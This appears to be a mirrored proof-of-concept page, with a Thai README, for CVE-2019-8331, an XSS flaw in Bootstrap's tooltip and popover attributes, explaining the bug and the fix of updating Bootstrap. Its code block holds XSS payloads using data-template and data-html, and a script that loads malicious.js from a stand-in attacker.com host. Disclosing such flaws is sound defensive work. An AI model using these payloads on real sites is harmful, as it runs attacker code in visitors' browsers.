关联漏洞
描述
ช่องโหว่ CVE-2019-8331
介绍
#### [Eng](https://github.com/Thampakon/CVE-2019-8331/blob/main/READMEENG.md)
## อธิบาย
**CVE-2019-8331 เป็นช่องโหว่ด้านความปลอดภัยประเภท Cross-Site Scripting (XSS) พบใน Bootstrap ซึ่งเป็นไลบรารี JavaScript ที่ใช้กันอย่างแพร่หลายในการพัฒนาเว็บไซต์และแอปพลิเคชันมือถือ ช่องโหว่นี้เกิดขึ้นเนื่องจาก Bootstrap ไม่ได้กรองข้อมูลอย่างเหมาะสมที่ส่งมากับแอตทริบิวต์ data-template ขององค์ประกอบ tooltip หรือ popover ทำให้ผู้โจมตีสามารถแทรกโค้ดที่เป็นอันตรายลงในหน้าเว็บได้**
**การโจมตีนี้สามารถเกิดขึ้นได้หากผู้โจมตีสามารถควบคุมข้อมูลที่จะแสดงเป็น tooltip หรือ popover ได้ เมื่อผู้ใช้เปิดใช้งาน tooltip หรือ popover โค้ดที่เป็นอันตรายจะถูกแทรกลงในหน้าเว็บและอาจถูกเรียกใช้โดยเบราว์เซอร์ของผู้ใช้**
**ช่องโหว่นี้ได้รับการแก้ไขใน Bootstrap เวอร์ชัน 4.3.1 และ 5.0.0-beta2 ผู้ดูแลระบบควรอัปเดต Bootstrap เวอร์ชันที่ได้รับผลกระทบเพื่อแก้ไขช่องโหว่นี้**
**รายละเอียดเพิ่มเติมเกี่ยวกับช่องโหว่ CVE-2019-8331:**
* **ประเภท: XSS**
* **ระดับความรุนแรง: กลาง**
* **ผลกระทบ: แทรก Code อัตราย**
* **ตำแหน่ง: Client**
* **วิธีแก้: อัพเดต Bootstrap**
```
<x data-toggle="tooltip" data-template="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>
```
## Credit
[BlackFan](https://gist.github.com/BlackFan/e968b5209637952cca1580dc8ffdfde6)
文件快照
[4.0K] /data/pocs/679c778e82c035f38a23e968f5620b68cb414e3d
├── [1.0K] LICENSE
├── [1.3K] READMEENG.md
└── [2.8K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。